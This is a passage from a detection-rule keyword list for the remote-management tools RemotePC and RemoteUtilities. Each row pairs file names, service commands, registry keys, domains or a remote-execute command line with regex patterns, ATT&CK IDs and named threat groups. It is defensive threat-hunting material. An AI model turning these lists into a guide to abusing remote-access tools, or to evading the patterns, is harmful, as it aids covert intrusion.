Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCPrinter.exe.config*",".{0,1000}RemotePCPrinter\.exe\.config.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCPrinting.exe*",".{0,1000}RemotePCPrinting\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCPrintView.exe*",".{0,1000}RemotePCPrintView\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - 
T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCProxys.dat*",".{0,1000}RemotePCProxys\.dat.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCService.exe*",".{0,1000}RemotePCService\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCService.txt*",".{0,1000}RemotePCService\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCService_2.txt*",".{0,1000}RemotePCService_2\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCShortcut.exe*",".{0,1000}RemotePCShortcut\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCSuite.Model.dll*",".{0,1000}RemotePCSuite\.Model\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCSuite.Service.dll*",".{0,1000}RemotePCSuite\.Service\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCSuite.Service.dll*",".{0,1000}RemotePCSuite\.Service\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*remotepcuiu.exe *",".{0,1000}remotepcuiu\.exe\s.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RpcApp*TransferClient.exe*",".{0,1000}RpcApp.{0,1000}TransferClient\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RpcApp*TransferServer.exe*",".{0,1000}RpcApp.{0,1000}TransferServer\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RpcApp\Tools\TransferClient.exe*",".{0,1000}RpcApp\\Tools\\TransferClient\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RPCAttendedInstaller.log*",".{0,1000}RPCAttendedInstaller\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rpcdownloader.exe *",".{0,1000}rpcdownloader\.exe\s.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RPCDownloaderLogFile.txt*",".{0,1000}RPCDownloaderLogFile\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RPCFireWallRule.exe*",".{0,1000}RPCFireWallRule\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RPCFireWallRulelogfile.txt*",".{0,1000}RPCFireWallRulelogfile\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RPCKeyMouseHandler.txt*",".{0,1000}RPCKeyMouseHandler\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*RPCPerformanceHealthCheck*",".{0,1000}RPCPerformanceHealthCheck.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rpcperformanceservice.exe*",".{0,1000}rpcperformanceservice\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RPCPerformanceService.exe*",".{0,1000}RPCPerformanceService\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rpcperfviewer.exe *",".{0,1000}rpcperfviewer\.exe\s.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RPCPerfViewer.log*",".{0,1000}RPCPerfViewer\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rpcprinterdownloader.exe*",".{0,1000}rpcprinterdownloader\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RPCProxyLatency.exe 
*",".{0,1000}RPCProxyLatency\.exe\s.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RPCsuiteLaunch.txt*",".{0,1000}RPCsuiteLaunch\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rule name=""TransferServer""*",".{0,1000}rule\sname\=\""TransferServer\"".{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""RPCService""*",".{0,1000}sc\s\sdelete\s\""RPCService\"".{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc start ""RPCService""*",".{0,1000}sc\s\sstart\s\""RPCService\"".{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc stop ""RPCService""*",".{0,1000}sc\s\sstop\s\""RPCService\"".{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc create RPCService 
start=auto*",".{0,1000}sc\screate\sRPCService\sstart\=auto.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc create RPCService*",".{0,1000}sc\screate\sRPCService.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ""RPCService""*",".{0,1000}sc\sdelete\s\""RPCService\"".{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete ViewerService*",".{0,1000}sc\sdelete\sViewerService.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc start ViewerService*",".{0,1000}sc\sstart\sViewerService.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc stop ""RPCService""*",".{0,1000}sc\sstop\s\""RPCService\"".{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc stop ViewerService*",".{0,1000}sc\sstop\sViewerService.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM 
tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*StartRPCPerformanceService*",".{0,1000}StartRPCPerformanceService.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*StartRPCPerformanceServiceOnStart*",".{0,1000}StartRPCPerformanceServiceOnStart.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*static.remotepc.com*",".{0,1000}static\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*static.remotepc.com*",".{0,1000}static\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","network","10","10","N/A","N/A","N/A","N/A" "*Uninstall RemotePC.lnk*",".{0,1000}Uninstall\sRemotePC\.lnk.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*viewerhostkeypopup.exe *",".{0,1000}viewerhostkeypopup\.exe\s.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*web1.remotepc.com*",".{0,1000}web1\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*web1.remotepc.com*",".{0,1000}web1\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*www1.remotepc.com*",".{0,1000}www1\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* Connection #*. Connection to ""*"" established. Mode: .*",".{0,1000}\sConnection\s\#.{0,1000}\.\sConnection\sto\s\"".{0,1000}\""\sestablished\.\sMode\:\s\\..{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* Connection #*. Connection to ""*"". Security check - OK. 
Mode: *",".{0,1000}\sConnection\s\#.{0,1000}\.\sConnection\sto\s\"".{0,1000}\""\.\sSecurity\scheck\s\-\sOK\.\sMode\:\s\s\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* Connection #*. Connection to ""*"". Security check - OK. Mode: ",".{0,1000}\sConnection\s\#.{0,1000}\.\sConnection\sto\s\"".{0,1000}\""\.\sSecurity\scheck\s\-\sOK\.\sMode\:\s\","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* Connection #*. Direct connection to * (*:5650).*",".{0,1000}\sConnection\s\#.{0,1000}\.\sDirect\sconnection\sto\s.{0,1000}\s\(.{0,1000}\:5650\)\..{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* -name:* -password:* -remoteexecute -filename*",".{0,1000}\s\-name\:.{0,1000}\s\-password\:.{0,1000}\s\-remoteexecute\s\-filename.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.remoteutilities.com*",".{0,1000}\.remoteutilities\.com.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 
- T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/host-7.2.2.0.msi*",".{0,1000}\/host\-7\.2\.2\.0\.msi.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/rfusclient.exe*",".{0,1000}\/rfusclient\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/rutserv.exe*",".{0,1000}\/rutserv\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/rutview.exe*",".{0,1000}\/rutview\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/usr/bin/r-agent*",".{0,1000}\/usr\/bin\/r\-agent.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","linux","10","10","N/A","N/A","N/A","N/A" 
"*/usr/bin/r-viewer*",".{0,1000}\/usr\/bin\/r\-viewer.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","linux","10","10","N/A","N/A","N/A","N/A" "*/usr/share/applications/r-agent.desktop*",".{0,1000}\/usr\/share\/applications\/r\-agent\.desktop.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","linux","10","10","N/A","N/A","N/A","N/A" "*/usr/share/applications/r-viewer.desktop*",".{0,1000}\/usr\/share\/applications\/r\-viewer\.desktop.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","linux","10","10","N/A","N/A","N/A","N/A" "*/VPDAgent.exe*",".{0,1000}\/VPDAgent\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\*-*-*_rut-*.zip.3bf*","[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}_rut-[0-9]\.[0-9]\.[0-9]\.[0-9]\.zip\.3bf","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\*-internet-id-log.csv*",".{0,1000}\\.{0,1000}\-internet\-id\-log\.csv.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Downloaded Installations\*\server-3.3.5.0.msi*",".{0,1000}\\AppData\\Local\\Downloaded\sInstallations\\.{0,1000}\\server\-3\.3\.5\.0\.msi.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Downloaded Installations\*\viewer-7.2.2.0.msi*",".{0,1000}\\AppData\\Local\\Downloaded\sInstallations\\.{0,1000}\\viewer\-7\.2\.2\.0\.msi.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\*\server-3.3.5.0.exe*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\server\-3\.3\.5\.0\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\*\server-3.3.5.0.msi*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\server\-3\.3\.5\.0\.msi.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - 
T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\rutserv*",".{0,1000}\\AppData\\Local\\Temp\\rutserv.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Roaming\Remote Utilities Files*",".{0,1000}\\AppData\\Roaming\\Remote\sUtilities\sFiles.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\CurrentControlSet\Services\MiniInternetIdService*",".{0,1000}\\CurrentControlSet\\Services\\MiniInternetIdService.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\CurrentVersion\Devices\Remote Utilities Printer*",".{0,1000}\\CurrentVersion\\Devices\\Remote\sUtilities\sPrinter.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\drivers\x64\rupdui.dll*",".{0,1000}\\drivers\\x64\\rupdui\.dll.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - 
T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\host-7.2.2.0.msi*",".{0,1000}\\host\-7\.2\.2\.0\.msi.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\InternetIdService.exe*",".{0,1000}\\InternetIdService\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\InternetIdService_*-*-*.txt",".{0,1000}\\InternetIdService_.{0,1000}\-.{0,1000}\-.{0,1000}\.txt","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 